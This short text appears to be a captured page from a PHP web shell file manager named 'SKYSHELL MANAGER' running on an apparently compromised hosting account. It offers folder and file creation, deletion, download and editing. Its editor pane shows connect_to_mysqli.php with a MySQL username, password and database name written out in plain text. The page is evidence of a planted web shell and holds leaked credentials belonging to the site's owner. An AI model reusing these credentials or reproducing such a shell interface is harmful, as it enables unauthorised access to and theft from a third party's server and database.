📁
SKYSHELL MANAGER-
🛒
PHP v7.4.33
Create Folder
Create File
Current Path:
home
/
oshofree
/
public_html
/
chbluxuries.com
/
chb_data
/
Name
Size
Permissions
Actions
📁
..
-
0755
🗑️
🔒
📄
config.php
7.06 KB
0444
🗑️
⬇️
✏️
🔒
📄
error_log
549.87 KB
0644
🗑️
⬇️
✏️
🔒
Editing: connect_to_mysqli.php
<?php $db_host = "localhost"; $db_username = "oshofree_stocks"; $db_pass = "oshofreestocks"; $db_name = "oshofree_stocks"; $con = mysqli_connect ("$db_host","$db_username","$db_pass","$db_name"); ?>
💾 Save Changes